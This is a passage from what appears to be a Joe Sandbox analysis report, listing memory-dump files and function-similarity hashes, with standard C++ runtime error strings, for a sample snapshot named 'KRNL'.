                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                                          • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                          • API String ID: 3109751735-1158432155
                                                                                                                                                                                                                                                          • Opcode ID: 8db41a135dd94c215ddfb7e1d4397b9eaa452265a8cee651155429ce22747484
                                                                                                                                                                                                                                                          • Instruction ID: 604c0ce2b604bc0234580df0db794dc208271eba5c89ba3b93fdbdc1fe117293
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8db41a135dd94c215ddfb7e1d4397b9eaa452265a8cee651155429ce22747484
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0F8F1614300EBE710AF58D846757BBE8EB58718F11892CF5989B381D3B9D894CB92